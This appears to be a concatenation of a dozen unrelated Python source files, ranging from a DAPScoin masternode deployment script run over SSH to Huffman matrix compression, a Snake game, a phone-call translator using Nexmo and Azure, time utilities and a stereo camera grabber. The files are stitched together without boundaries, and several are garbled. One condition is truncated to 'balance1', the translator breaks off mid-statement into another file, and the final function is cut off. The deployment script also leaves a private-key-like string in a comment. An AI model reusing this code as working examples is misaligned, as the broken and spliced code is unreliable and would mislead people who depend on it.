startStakingWallet(masternode, hard) stopAWallet(masternode) nodes = '' for server in s['servers']: nodes += '\naddnode='+server['address'] dapsConfData = open('boot/config/dapscoin.conf', 'r').read() + nodes dapsConfData = dapsConfData + '\n' + 'masternode=1\n' + 'externalip=' + mn1ip + '\nmasternodeprivkey=' + mnprivateKey mn1Connect=ssh(masternode) if mn1Connect: send(mn1Connect, 'echo "'+dapsConfData+'">~/dapscoin/dapscoin.conf') send(mn1Connect, 'dapscoind '+s['serveroption']+' -daemon')#Start daemon disconnect(mn1Connect) #8. Start masternode from control wallet p = Popen('dapscoin-cli ' + s['serveroption'] + ' startmasternode alias false ' + mnalias, shell=True, stdout=PIPE, stderr=STDOUT) lines = p.stdout.readlines() if 'Successfully started 1' in str(lines): print('Sucessfully start control wallet masternode\n') else: print('Failed to start control wallet masternode\n') return 0 #9. Start masternode in VPS res = send(mn1Connect, 'dapscoin-cli '+s['serveroption']+' startmasternode local false')#Start daemon print(res + '\n') #10. Start staking nodes... #transfer funds to specified destination def transferFromMainWallet(destination, amount = s['coinamount']): main = s['main'] connect = ssh(main) if connect: response = send(connect, 'dapscoin-cli ' + s['serveroption'] + ' sendtoaddress ' + destination + ' ' + amount) if response: txhash = response[0] return txhash disconnect(connect) #restart specified servers def reboot(servers = s['servers']): for server in servers: connect = ssh(server) if connect: send(connect, 'sudo reboot') send(connect, getpass()) disconnect(connect) sleep(60) for server in servers: connect = ssh(server) if connect: send(connect, 'dapscoind') #transfer and install binary files from local machine to all specified servers def installBinToServers(pathtobin, servers=s['servers']): success = [] for server in servers: success.append(installbinaries(server, pathtobin)) return all(success) #transfer and install binary files from local machine to specified server def installbinaries(server, pathtobin): sendFile(server, pathtobin+'dapscoind.bin '+pathtobin+'dapscoincli.bin', '/usr/bin/') connect = ssh(server) if connect: send(connect, 'cd /usr/bin/') send(connect, 'rm dapscoind dapscoin-cli') send(connect, 'mv dapscoind.bin dapscoind') send(connect, 'mv dapscoin-cli.bin dapscoin-cli') disconnect(connect) return 1 else: return 0 # def transfer(masternode, worker, amount=s['coinamount'] ): # connect = ssh(masternode) # send(connect, 'dapscoind')#needs to connect # send(connect, 'dapscoin-cli '+s['serveroption']+'masternode genkey') # coinAddress = send(connect,'dapscoin-cli '+s['serveroption']+'getaccountaddress'+s['alias'])#what is alias? # print coinAddress # disconnect(connect) # connect = ssh(worker) # send(connect, 'dapscoin-cli '+s['serveroption']+'sendtoaddress '+coinAddress+amount) # disconnect(connect) # connect = ssh(masternode) # send(connect, 'dapscoin-cli '+s['serveroption']+'getbalance') def awaitWorkers(workers, amount=s['coinamount']): ready = False while (not ready): ready = True for worker in workers: connect = ssh(worker) balance = send(connect, 'dapscoin-cli '+s['serveroption']+'getbalance') if (balance1): transferFromMainWallet(arg['alt'][0], arg['alt'][1]) else: transferFromMainWallet(arg['alt'][0]) if (arg['k'].find('restartwallet')!=-1): restartAllWallets(arg['hard']) if (arg['k'].find('stopdaemon')!=-1): if (len(arg['v'])): stopAllWalletDaemons(arg['v']) else: stopAllWalletDaemons() if (arg['k'].find('start')!=-1): startStakingWallets(arg['v'], arg['hard']) if (arg['k'].find('genstakingconfig')!=-1): genStakingNodeConfigFileScript(arg['v']) if (arg['k'].find('inst')!=-1): if (len(arg['alt'])): if (len(arg['v'])): installBinToServers(arg['alt'][0],arg['v']) else: installBinToServers(arg['alt'][0]) else: print "Could not install binaries. Please provide a source path." runArgs() print args #sendFile(s['main'], 'test.test', '/home/dapstest/') #sendFile(s['main'], 'boot/', '/home/dapstest/','-r') #genConfigFileScript(s['masternodes'][0],'92zcRZrsy2JJjuY9kXGA4n7jSihfjGzrjKwB4s4Mq4UG42NPgBe', '172.16.31.10') #masternodeScript(s['masternodes'],s['stakingnodes'][0]) aliyun/api/rest/Ecs20130110ReleasePublicIpAddressRequest.py0 ''' Created by auto_sdk on 2015.10.09 ''' from aliyun.api.base import RestApi class Ecs20130110ReleasePublicIpAddressRequest(RestApi): def __init__(self,domain='ecs.aliyuncs.com',port=80): RestApi.__init__(self,domain, port) self.InstanceId = None self.PublicIpAddress = None def getapiname(self): return 'ecs.aliyuncs.com.ReleasePublicIpAddress.2013-01-10' import os import subprocess import json class Colors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKCYAN = '\033[96m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def is_exist(path: str): return os.path.isfile(path) if __name__ == "__main__": print(Colors.HEADER + Colors.BOLD + "Begin functional tests" + Colors.ENDC) directories = next(os.walk("."))[1] directories.reverse() args = ["--enable-logger"] if is_exist("../../cmake-build-debug/naobi"): args.insert(0, "../../cmake-build-debug/./naobi") else: args.insert(0, "../../build/./naobi") for directory in directories: args.append(directory + "/main.naobi") process = subprocess.Popen(args, stdout=subprocess.PIPE, stdin=subprocess.PIPE) if process.returncode != 1 and is_exist(directory + "/scenario.json"): f = open(directory + "/scenario.json") scenarios = json.loads(f.read()) for count, scenario in enumerate(scenarios): if len(scenario["in"]) != 0: process.stdin.write(bytes(scenario["in"] + '\n', "UTF-8")) process.stdin.flush() if scenario["out"] == "": continue test = process.stdout.readline().decode().replace('\n', '') if test != scenario["out"]: print(Colors.FAIL + Colors.BOLD + "Test " + directory + " failed!\nExpected '" + str(scenario["out"]) + "' got '" + str(test) + "' in scenario " + str(count + 1)) exit(1) process.wait() if process.returncode != 0: print(Colors.FAIL + Colors.BOLD + "Test " + directory + " failed!" + Colors.ENDC) exit(1) else: print(Colors.OKGREEN + Colors.BOLD + "Test " + directory + " passed!" + Colors.ENDC) print() print(Colors.OKGREEN + Colors.BOLD + "All tests passed!" + Colors.ENDC) giosumarin/sHAMsHAM_package/sHAM/huffman.py from heapq import heappush, heappop, heapify import numpy as np from joblib import Parallel, delayed from numba import njit, jit def do_all_for_me(matr, bit_words_machine): """ It takes the matrix and calls all the functions necessary to compress it Args: matr: matrix to be compressed bit_words_machine: machine word bit number returns: int_from_string: list of integers representing the elements encoded with huffman d_rev: dict encoded --> element min_length_encoded: minimum length of huffman encodings """ symb2freq = dict_elem_freq(matr) e = encode(symb2freq) d_rev = reverse_elements_list_to_dict(e) d = dict(e) encoded = matrix_with_code(matr, d, d_rev) list_bin = make_words_list_to_int(encoded, bit_words_machine) min_length_encoded = min_len_string_encoded(d_rev) int_from_string = convert_bin_to_int(list_bin) return int_from_string, matr, d_rev, bit_words_machine, matr.dtype, min_length_encoded def encode(symb2freq): """ Calculate Huffman encoding Args: symb2freq: dict element --> frequency Returns: list of tuples [ (element, huffman_element), ... ] """ heap = [[wt, [sym, ""]] for sym, wt in symb2freq.items()] heapify(heap) while len(heap) > 1: lo = heappop(heap) hi = heappop(heap) for pair in lo[1:]: pair[1] = '0' + pair[1] for pair in hi[1:]: pair[1] = '1' + pair[1] heappush(heap, [lo[0] + hi[0]] + lo[1:] + hi[1:]) return sorted(heappop(heap)[1:], key=lambda p: (len(p[-1]), p)) def reverse_elements_list_to_dict(output_encoder): """ Args: output_encoder: list of tuples [ (element, encoded), ... ] Returns: dict encoded --> element """ reverse = [] for a,b in output_encoder: reverse += [[b,a]] return dict(reverse) def dict_elem_freq(matrix): """ Calculate frequency of input matrix elements Args: matrix: ndarray numpy Returns: dict element --> frequency """ elem, freq = np.unique(matrix, return_counts=True) symb2freq = dict(zip(elem,freq)) return symb2freq def max_len_string_encoded(d_rev): """ Calculate maximum length of huffman encodings Args: d_rev: dict encoded --> element Returns: maximum number of characters """ maxs = 0 for x in d_rev: len_bit = len(x) if(len_bit > maxs): maxs = len_bit return maxs def min_len_string_encoded(d_rev): """ Calculate minimum length of huffman encodings Args: d_rev: dict encoded --> element Returns: minimum number of characters """ min = 1e10 for x in d_rev: len_bit = len(x) if(len_bit < min): min = len_bit return min def find_next(int_, index_int, index_bit, d_rev, bits_for_element, last_int_decoded, min_length_encoded=1): """ Find the next item in the list of integers that represents the various weights encoded with huffman Args: int_: list of integer representing one or more weights encoded with huffman index_int: pointer indicating the position where we are in int_ index_bit: pointer indicating which bits of the integer we are expanding d_rev: dict encoded --> element bits_for_element: number of bits used for an integer last_int_decoded: last integer transformed into binary string analyzed min_length_encoded: minimum length of the huffman encoding (allows to scroll the integer transformed into a string in several bits at a time) Returns: Next element """ current_code = "" while True: if last_int_decoded == "-1": encoded_text = int_to_bin_string(int_[index_int], bits_for_element) last_int_decoded = encoded_text index_int += 1 else: encoded_text = last_int_decoded[index_bit:] if current_code == "": current_code += encoded_text[:min_length_encoded] encoded_text = encoded_text[min_length_encoded:] index_bit += len(current_code) if current_code in d_rev: current = d_rev[current_code] current_code = "" if current_code != "": for bit in encoded_text: current_code += bit index_bit += 1 if(current_code in d_rev): current = d_rev[current_code] current_code = "" break if current_code == "": if index_bit == bits_for_element: index_bit = 0 last_int_decoded = "-1" break else: index_bit = 0 last_int_decoded = "-1" return current, index_int, index_bit, last_int_decoded def matrix_with_code(matrix, d, d_rev): """ Create matrix like original with encodings instead of values Args: matrix: original matrix ndarray d: dict element --> encoded d_rev: dict encoded --> element Returns: matrix ndarray """ def multiprocessing_func(matrix, n, d, k): n[matrix == k] = d[k] num_bits = max_len_string_encoded(d_rev) n = np.ndarray(matrix.shape, dtype='U{}'.format(num_bits)) Parallel(n_jobs=-1, require='sharedmem')(delayed(multiprocessing_func)(matrix, n, d, k) for k in d) return n def decode_matrix(matrix, encoded_matrix, d_rev): """ Create matrix like the original starting from the matrix containing the encodings instead of the elements Args: matrix: original matrix ndarray encoded_matrix: matrix with encodings ndarray d_rev: dict encoded --> element Returns: matrix ndarray """ def multiprocessing_func(matrix, n, d, k): n[matrix == k] = d[k] n1 = np.empty_like(matrix) Parallel(n_jobs=-1, require='sharedmem')(delayed(multiprocessing_func)(encoded_matrix, n1, d_rev, k) for k in d_rev) return n1 def make_words_list_to_int(matrix_with_code, bit_words_machine): """ Starting from the matrix with the encodings, column by column, create a list of long strings bit_words_machine Args: matrix_with_code: matrix with encodings ndarray bit_words_machine: machine word bit number Returns: list of strings of length bit_words_machine """ bit = bit_words_machine list_string_col =[] string = '' for x in np.nditer(matrix_with_code, order='F'): string += (np.array2string(x)[1:-1]) if len(string) > bit: bit_overflow = len(string)%bit list_string_col += [string[:-bit_overflow]] string = string[-bit_overflow:] elif len(string) == bit: list_string_col += [string] string = '' bit_remain = len(string) if bit_remain > 0: string += "0"*(bit-bit_remain) #padding di 0 per renderla lunga bit list_string_col += [string] return list_string_col def convert_bin_to_int(list_string_col): """ Convert a list of strings to a list of integers Args: list_string_col: list of strings (characters 0 or 1) Returns: list of integer """ int_from_string_col = [int(x, 2) for x in list_string_col] return int_from_string_col def int_to_bin_string(x, bits_for_element): """ Convert an integer to a binary string and put initial padding to make it long bits_for_element x: integer bit_for_element: bit length of machine words Returns: string """ encoded_text = "{0:b}".format(x) len_bin = len(encoded_text) if len_bin < bits_for_element: #aggiungo gli 0 iniziali che perdo trasformando in int encoded_text = "0"*(bits_for_element-len_bin)+encoded_text return encoded_text @njit(["float32[:,:](float32[:,:], float32[:,:], int32, float32, int32)","int64[:,:](int64[:,:], int64[:,:], int32, int64, int32)"],nogil=True, fastmath=True, cache=True) def mult_for_row(input_x, output, current_row, current_d, column): for i in range(input_x.shape[0]): output[i][column] += input_x[i][current_row]*current_d return output def dot_for_col(input_x, int_from_string, matrix, d_rev, bits_for_element, output_type='float32', min_length_encoded=1): """ Multiplies input_x dot matrix coded in list of integers. Reassemble matrix column by column, when i find an element i go to accumulate the product to calculate the dot Args: input_x: expanded matrix ndarray int_from_string: list of integers matrix: original matrix ndarray d_rev: dict encoded --> element bit_for_element: number of bits used for an integer Returns: matrix ndarray """ output = np.zeros((input_x.shape[0], matrix.shape[1]), order='F', dtype=output_type) input_x = np.asfortranarray(input_x) index_int = 0 index_bit = 0 last_int_decoded = "-1" expected_elements = matrix.shape[0] * matrix.shape[1] row = 0 column = 0 for _ in range(expected_elements): current, index_int, index_bit, last_int_decoded = find_next(int_from_string, index_int, index_bit, d_rev, bits_for_element, last_int_decoded, min_length_encoded) if current != 0: output = mult_for_row(input_x, output, row, current, column) row += 1 if row >= matrix.shape[0]: column += 1 row = 0 return output ############# FASTER VERSION WITH GENERATE WEIGHTS COLUMN AND USE NUMPY.DOT # decoded_text = "" # weights = np.ndarray((matrix.shape[0],), dtype=matrix.dtype) # output = np.ndarray((input_x.shape[0],matrix.shape[1]), dtype=matrix.dtype) # expected_elements = matrix.shape[0] * matrix.shape[1] # elements = 0 # row = 0 # column = 0 # # for x in int_from_string: # encoded_text = int_to_bin_string(x, bits_for_element) # for bit in encoded_text: # if expected_elements == 0: # break # current_code += bit # if(current_code in d_rev): # weights[row,] = d_rev[current_code] # current_code = "" # expected_elements -= 1 # row += 1 # if row >= matrix.shape[0]: # output[:,column] = np.dot(input_x,weights) # column += 1 # row = 0 # # return output ############# MULTICORE VERSION WITHOUT GENERATE WEIGHTS COLUMN ##### STILL SLOWER THAN ORIGINAL dot_for_col # def dot_for_col(input_x, int_from_string, matrix, d_rev, bits_for_element): # @njit # def mult_for_row(input_x, output, row, elem, column): # for i in range(input_x.shape[0]): # output[i][column] += input_x[i][row]*elem # return output # # # current_code = "" # decoded_text = "" # weights = np.ndarray((matrix.shape[0],), dtype=matrix.dtype) # output = np.zeros((input_x.shape[0],matrix.shape[1]), dtype=matrix.dtype) # expected_elements = matrix.shape[0] * matrix.shape[1] # elements = 0 # row = 0 # column = 0 # # for x in int_from_string: # encoded_text = "{0:b}".format(x) # len_bin = len(encoded_text) # if len_bin < bits_for_element: #aggiungo gli 0 iniziali che perdo trasformando in int # encoded_text = "0"*(bits_for_element-len_bin)+encoded_text # for bit in encoded_text: # if expected_elements == 0: # break # current_code += bit # if(current_code in d_rev): # elem = d_rev[current_code] # current_code = "" # expected_elements -= 1 # output = mult_for_row(input_x, output, row, elem, column) # row += 1 # if row >= matrix.shape[0]: # column += 1 # row = 0 # # return output from tkinter import Tk, Frame, Button, Label class Window(): def __init__(self, logic): self.tk = Tk() self.tk.title("Snake M122") self.tk.minsize() self.tk.resizable(False, False) self.tk.bind("", self.__onKeyPress) self.logic = logic self.isRunning = False self.__build() self.draw() def __onKeyPress(self, ev): if(ev.keysym == "Up"): self.logic.onDirectionChange("u") elif(ev.keysym == "Right"): self.logic.onDirectionChange("r") elif(ev.keysym == "Down"): self.logic.onDirectionChange("d") elif(ev.keysym == "Left"): self.logic.onDirectionChange("l") def __build(self): f = Frame(self.tk) self.tiles = dict() self.canvas = self.__getCanvas(f) self.canvas.grid(row=0, column=0, sticky="NESW", padx=10, pady=10) self.btns = self.__getBtns(f) self.btns.grid(row=1, column=0, sticky="NESW", padx=10, pady=10) f.pack() def __getCanvas(self, master): f = Frame(master) for t in self.logic.grid.getTiles1D(): tile = Frame(f, height=25, width=25) self.__colorTile(t, tile) tile.grid(row=t.y, column=t.x) self.tiles[t.getKey()] = tile return f def startBtnClick(self): if(not self.logic.isRunning): self.draw() self.setCountLabel(self.logic.countApple) self.elStartBtn.config(text="Abbrechen", fg="red") self.__loop() else: self.logic.reset() self.elStartBtn.config(text="Start", fg="green") def __loop(self): if(self.logic.loop()): self.draw() self.tk.after(200, self.__loop) else: self.elStartBtn.config(text="Start", fg="green") def setCountLabel(self, val): self.elCountLabel.config(text=val) def __getBtns(self, master): f = Frame(master) self.elStartBtn = Button(f, text="Start", command=lambda: self.tk.after(0, self.startBtnClick), fg="green", width=20) self.elStartBtn.grid(row=0, column=0) self.elCountLabel = Label(f, text="", fg="green", padx=10) self.elCountLabel.grid(row=0, column=1) return f def draw(self): self.setCountLabel(self.logic.countApple) for e in self.logic.grid.getTiles1D(): self.__colorTile(e, self.tiles[e.getKey()]) def __colorTile(self, tileObj, tileEl): if(tileObj.isApple): tileEl.config(bg="red") elif(tileObj.isSnake): tileEl.config(bg="green") else: tileEl.config(bg="white") def mainloop(self): self.tk.mainloop() """ @Project : DuReader @Module : retrain_new_vacabulary.py @Author : Deco [] @Created : 5/4/18 2:42 PM @Desc : """ import logging import os import gensim base_dir = os.path.dirname( os.path.dirname( os.path.dirname( os.path.abspath(__file__) ) ) ) file_name = os.path.join(base_dir, "gensim2/data/word2vec_text8_google.model") logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) model = gensim.models.Word2Vec.load(file_name) new_sentences = [['Messi', 'has', 'the', 'edge', 'with', 'intricate', 'skill', 'and', 'vision'], ['Ronaldo', 'makes', 'up', 'for', 'with', 'strength', 'speed', 'and', 'power', '.'], ['Messi', 'Messi', 'Messi', 'Messi', 'Messi'], ] model.build_vocab(new_sentences, update=True) model.train(new_sentences, total_examples=model.corpus_count, epochs=3) 0 # -*- coding: utf-8 -*- """ Created on Tue Jul 14 13:50:47 2020 @author: kench """ import matplotlib.pyplot as plt import pandas as pd import numpy as np df=pd.read_csv('fb441e62df2d58994928907a91895ec62c2c42e6cd075c2700843b89.csv') df.head() #convert temperature from tenths of degree C to degree C df['Data_Value']=0.1*df.Data_Value days=list(map(lambda x: x.split('-')[-2]+'-'+x.split('-')[-1], df.Date)) years=list(map(lambda x: x.split('-')[0], df.Date)) df['Days']=days df['Years']=years df_2005_to_2014=df[(df.Days!='02-29')&(df.Years!='2015')] df_2015=df[(df.Days!='02-29')&(df.Years=='2015')] df_max=df_2005_to_2014.groupby(['Element','Days']).max() df_min = df_2005_to_2014.groupby(['Element','Days']).min() df_2015_max=df_2015.groupby(['Element','Days']).max() df_2015_min = df_2015.groupby(['Element','Days']).min() record_max=df_max.loc['TMAX'].Data_Value record_min=df_min.loc['TMIN'].Data_Value record_2015_max=df_2015_max.loc['TMAX'].Data_Value record_2015_min=df_2015_min.loc['TMIN'].Data_Value plt.figure(figsize=(10,7)) plt.plot(np.arange(len(record_max)),record_max, '--k', label="record high") plt.plot(np.arange(len(record_max)),record_min, '-k',label="record low") plt.scatter(np.where(record_2015_min < record_min.values),record_2015_min[record_2015_min < record_min].values,c='b',label='2015 break low') plt.scatter(np.where(record_2015_max > record_max.values),record_2015_max[record_2015_max > record_max].values,c='r',label='2015 break high') plt.xlabel('month',size=14) plt.ylabel('temperature($^\circ C$ )',size=14) plt.xticks(np.arange(0,365,31), ['Jan','Feb', 'Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']) ax=plt.gca() ax.axis([0,365,-40,40]) plt.gca().fill_between(np.arange(0,365),record_min,record_max,facecolor='blue',alpha=0.25) plt.title('Record temperatures for different months between 2005-2014',size=14) plt.legend(loc=0) plt.show()coding_interviews/leetcode/easy/is_sum_equal/is_sum_equal.py # https://leetcode.com/problems/check-if-word-equals-summation-of-two-words alphabet = { 'a': '0', 'b': '1', 'c': '2', 'd': '3', 'e': '4', 'f': '5', 'g': '6', 'h': '7', 'i': '8', 'j': '9', } def get_numerical_value(word): list_of_chars = [] for char in word: list_of_chars.append(alphabet[char]) return int(''.join(list_of_chars)) def is_sum_equal(first_word, second_word, target_word): first_num = get_numerical_value(first_word) second_num = get_numerical_value(second_word) target_num = get_numerical_value(target_word) return first_num + second_num == target_num from string import Template import json import os import struct import StringIO from tornado import httpserver, httpclient, ioloop, web, websocket, gen import nexmo from azure_auth_client import AzureAuthClient from config import HOSTNAME, CALLER, LANGUAGE1, VOICE1, LANGUAGE2, VOICE2 from secrets import NEXMO_APPLICATION_ID, NEXMO_PRIVATE_KEY, MICROSOFT_TRANSLATION_SPEECH_CLIENT_SECRET, NEXMO_NUMBER nexmo_client = nexmo.Client(application_id=NEXMO_APPLICATION_ID, private_key=NEXMO_PRIVATE_KEY) azure_auth_client = AzureAuthClient(MICROSOFT_TRANSLATION_SPEECH_CLIENT_SECRET) conversation_id_by_phone_number = {} call_id_by_conversation_id = {} class CallHandler(web.RequestHandler): @web.asynchronous def get(self): data = {} data['hostname'] = HOSTNAME data['nexmo_number'] = NEXMO_NUMBER data['whoami'] = self.get_query_argument('from') data['cid'] = self.get_query_argument('conversation_uuid') conversation_id_by_phone_number[self.get_query_argument('from')] = self.get_query_argument('conversation_uuid') print(conversation_id_by_phone_number) filein = open('ncco.json') src = Template(filein.read()) filein.close() ncco = json.loads(src.substitute(data)) self.write(json.dumps(ncco)) self.set_header("Content-Type", 'application/json; charset="utf-8"') self.finish() class EventHandler(web.RequestHandler): @web.asynchronous def post(self): body = json.loads(self.request.body) if 'direction' in body and body['direction'] == 'inbound': if 'uuid' in body and 'conversation_uuid' in body: call_id_by_conversation_id[body['conversation_uuid']] = body['uuid'] self.content_type = 'text/plain' self.write('ok') self.finish() class WSHandler(websocket.WebSocketHandler): whoami = None def open(self): print("Websocket Call Connected") def translator_future(self, translate_from, translate_to): uri = "wss://dev.microsofttranslator.com/speech/translate?from={0}&to={1}&api-version=1.0".format(translate_from[:2], translate_to) request = httpclient.HTTPRequest(uri, headers={ 'Authorization': 'Bearer ' + azure_auth_client.get_access_token(), }) return websocket.websocket_connect( request, on_message_callback=self.speech_to_translation_completed) def speech_to_translation_completed(self, new_message): if new_message is None: print("Got None Message") return msg = json.loads(new_message) if msg['translation'] != '': print("Translated: '{}' -> '{}'".format(msg['recognition'], msg['translation'])) for key, value in conversation_id_by_phone_number.iteritems(): if key != self.whoami and value is not None: if self.whoami == CALLER: speak(call_id_by_conversation_id[value], msg['translation'], VOICE2) else: speak(call_id_by_conversation_id[value], msg['translation'], VOICE1) @gen.coroutine def on_message(self, message): if type(message) == str: ws = yield self.ws_future ws.write_message(message, binary=True) else: message = json.loads(message) self.whoami = message['whoami'] print("Sending wav header") header = make_wave_header(16000) if self.whoami == CALLER: self.ws_future = self.translator_future(LANGUAGE1, LANGUAGE2) else: self.ws_future = self.translator_future(LANGUAGE2, LANGUAGE1) ws = yield self.ws_future ws.write_message(header, binary=True) @gen.coroutine def on_close(self): print("Websocket Call Disconnected") def make_wave_header(frame_rate): """ Generate WAV header that precedes actual audio data sent to the speech translation service. :param frame_rate: Sampling frequency (8000 for 8kHz or 16000 for 16kHz). :return: binary string """ if frame_rate not in [8000, 16000]: raise ValueError( "Sampling frequency, frame_rate, should be 8000 or 16000.") nchannels = 1 bytes_per_sample = 2 output = StringIO.StringIO() output.write('RIFF') output.write(struct.pack('RinPham/RiBo-Core __all__ = [ 'round_time', 'timebetween' ] import re, pytz from pytz import * import datetime from datetime import timedelta COUNTRIES_SUPPORTED = ['US', 'CANADA'] def time_to_float(hour, minute): """ Convert time to float number :param hour: :param minute: :return: """ if not isinstance(hour, float): hour = float(hour) if not isinstance(minute, float): minute = float(minute) minute = minute * 1 / 60 if hour > 0: return hour + minute else: return hour - minute def float_to_time(hour): h = int(hour) m = hour - h return h, abs(int(m * 60)) def round_time(hour, minute, error=30, *args): if not isinstance(hour, float): hour = int(hour) if not isinstance(minute, int): minute = int(minute) if error == 30: if 45 <= minute <= 59: if hour > 0: hour += 1 else: hour -= 1 minute = 0 if 0 < minute <= 15: minute = 0 if 16 <= minute < 45: minute = 30 else: _error = error / 2 if (60 - _error) <= minute <= 59: if hour >= 0: hour += 1 else: hour -= 1 minute = 0 else: range = 60 / error i = 1 while i <= range: _minute = i * error _minute2 = ((i - 1 ) * error) + _error if minute < _minute2: minute = (i - 1 ) * error break elif minute > _minute2 and minute <= _minute: minute = _minute break i += 1 return hour, minute def timebetween(a, b): start = a.split(':') end = b.split(':') start = time_to_float(start[0], start[1]) end = time_to_float(end[0], end[1]) return float_to_time(start - end) def get_local_time(timezone_str, utc_time): """ Shift to local timezone from 'now' by 'timezone_id' :param timezone_id: :param now: :return: """ if timezone_str: return utc_time.astimezone(pytz.timezone(timezone_str)) return utc_time def time_is_between(now, start, end): """ Check now is between start and end :param now: string format 'H:M' or datetime.now instance :param start: string format 'H:M' :param end: string format 'H:M' :return: boolean """ if not isinstance(now, basestring): now = now.strftime('%H:%M') now = time_to_float(*now.split(':')) start = time_to_float(*start.split(':')) end = time_to_float(*end.split(':')) return (start <= now <= end) or (start >= now >= end) def get_tz_list(): all_tz = pytz.all_timezones regstr = '(?i){}'.format("/|".join(COUNTRIES_SUPPORTED)) countries_regx = re.compile(regstr) tz_supported = filter(lambda x: countries_regx.match(x) , all_tz) now = datetime.datetime.now(pytz.UTC) tz_lst = [] for tz in tz_supported: country, timezone_name = tz.split("/") offset = now.astimezone(pytz.timezone(tz)).strftime('%z') offset_value = int(offset[:3]) if str(tz) == "US/Pacific-New": continue tz_str = '(UTC{}) {}'.format(':'.join([offset[:3], offset[3:]]), tz) tz_lst.append(dict( timezone=tz, offset_value=offset_value, tz_str=tz_str, country=country, timezone_name=timezone_name )) tz_lst = sorted(tz_lst, key=lambda k: (k['country'],k['offset_value']), reverse=True) #tz_lst.reverse() return tz_lst def location_to_tz(country, state): try: from datetime import datetime import pytz # $ pip install pytz from geopy import geocoders # $ pip install geopy # find timezone given country and subdivision g = geocoders.GoogleV3() location_str = '{0}/{1}'.format(country,state) place, (lat, lng) = g.geocode(location_str) timezone = g.timezone((lat, lng)) return timezone except: return Noneimport threading import time import numpy as np import abc import json ############################################################ ########### CAMERA FACTORY ########### ########################################################### _GRABBER_FACTORY={} def get_camera(name, frame_queue, config=None, framerate=30): """ factory method to construct a camera wrapper """ if name not in _GRABBER_FACTORY: raise Exception('Unrecognized camera type: {}'.format(name)) else: return _GRABBER_FACTORY[name](frame_queue, config=config, framerate=framerate) def get_available_camera(): return _GRABBER_FACTORY.keys() def register_camera_to_factory(): def decorator(cls): _GRABBER_FACTORY[cls._name]=cls return cls return decorator ##################################################################### ############## ABSTRACT CAMERA ############# #################################################################### class ImageGrabber(threading.Thread): """ Thread to grab frames from the camera and load them in frame_queue """ __metaclass__=abc.ABCMeta def __init__(self, frame_queue, config=None, framerate=30): """ Args ----- frame_queue: queue synchronized queue where left and right frames will be loaded config: path path to json file for calibration and/or other configuration parameters framerate: int target frame per second """ threading.Thread.__init__(self) self._config = config self._connect_to_camera() self._buffer = frame_queue self._sleeptime = 1/framerate self._stop_acquire=False def stop(self): """ Stop the acquisition of new frames from the camera and kill the thread """ self._stop_acquire=True def run(self): """ Main body method, grab frames from camera and put them on buffer as a [2,h,w,c] numpy array """ while not self._stop_acquire: l,r = self._read_frame() self._buffer.put(np.stack([l,r],axis=0)) time.sleep(self._sleeptime) self._disconnect_from_camera() @abc.abstractmethod def _read_frame(self): """ Read left and right rectified frame and return them """ @abc.abstractmethod def _connect_to_camera(self): """ Connect to external camera """ @abc.abstractmethod def _disconnect_from_camera(self): """ Disconnect from external camera """ ######################################################################### ################# ZED MINI ################# ######################################################################### import pyzed.sl as sl @register_camera_to_factory() class ZEDMini(ImageGrabber): _name = 'ZED_Mini' _key_to_res = { '2K' : sl.RESOLUTION.RESOLUTION_HD2K, '1080p' : sl.RESOLUTION.RESOLUTION_HD1080, '720p' : sl.RESOLUTION.RESOLUTION_HD720, 'VGA' : sl.RESOLUTION.RESOLUTION_VGA } """ Read Stereo frames from a ZED Mini stereo camera. """ def _read_frame(self): err = self._cam.grab(self._runtime) if err == sl.ERROR_CODE.SUCCESS: self._cam.retrieve_image(self._left_frame, sl.VIEW.VIEW_LEFT) self._cam.retrieve_image(self._right_frame, sl.VIEW.VIEW_RIGHT) return self._left_frame.get_data()[:,:,:3], self._right_frame.get_data()[:,:,:3] def _connect_to_camera(self): # road option from config file with open(self._config) as f_in: self._config = json.load(f_in) self._params = sl.InitParameters() if 'resolution' in self._config: self._params.camera_resolution = self._key_to_res[self._config['resolution']] else: self._params.camera_resolution = sl.RESOLUTION.RESOLUTION_HD720 if 'fps' in self._config: self._params.camera_fps = self._config['fps'] else: self._params.camera_fps = 30 self._cam = sl.Camera() status = self._cam.open(self._params) if status != sl.ERROR_CODE.SUCCESS: print(status) raise Exception('Unable to connect to Stereo Camera') self._runtime = sl.RuntimeParameters() self._left_frame = sl.Mat() self._right_frame = sl.Mat() def _disconnect_from_camera(self): self._cam.close() ######################################################################### ################# SMATT CAM ################# ######################################################################### #Example of frame grabber for a custom camera # from stereocam import StereoCamera # @register_camera_to_factory() # class SmattCam(ImageGrabber): # _name='SmattCam' # """ # Read frames from smart camera from Mattoccia et al. # """ # def _read_frame(self): # left,right = self._cam.grab_frames() # left = np.repeat(left, 3, axis=-1) # right = np.repeat(right, 3, axis=-1) # return left,right # def _connect_to_camera(self): # self._cam = StereoCamera(self._config) # self._cam.calibrate() # def _disconnect_from_camera(self): # pass0 import asyncio from concurrent.futures import Future from functools import partial __version__ = '0.1' class Actor(object): def __init__(self, obj, loop): self._obj = obj self._loop = loop def __getattr__(self, name): attr = self._obj.__getattribute__(name) if not callable(attr): return attr else: if asyncio.iscoroutinefunction(attr): def wrap(f=attr, loop=self._loop): def func(*args, **kwargs): co = attr(*args, **kwargs) return asyncio.run_coroutine_threadsafe(co, loop) return func else: def wrap(f=attr, loop=self._loop): def task(future, *args, **kwargs): try: r = f(*args, **kwargs) future.set_result(r) except Exception as e: future.set_exception(e) return future def func(*args, **kwargs): future = Future() loop.call_soon_threadsafe( partial(task, future, *args, **kwargs)) return future return func return wrap() from enum import Enum from dataclasses import is_dataclass from typing import get_origin, get_args from cbor2.compat import int2bytes from . import IncompliantError from typing import List, Dict, Union from typing import get_origin, get_args, _GenericAlias from dataclasses import fields, is_dataclass from dataclasses import dataclass, fields, MISSING def cast_generic_object(ctx, data_struct, data_type, cast_object): alias_origin = get_origin(data_type) if isinstance(alias_origin, type): if issubclass(alias_origin, list): # List[Data] item_type = get_args(data_type)[0] return [ cast_object(ctx, item, item_type) for item in data_struct ] if issubclass(alias_origin, dict): # Map[Key, Data] key_type, val_type = get_args(data_type)[:2] return { cast_object(ctx, k, key_type): cast_object(ctx, v, val_type) for k, v in data_struct.items() } if alias_origin == Union: # Union[A, B, None] return cast_union_object(ctx, data_struct, 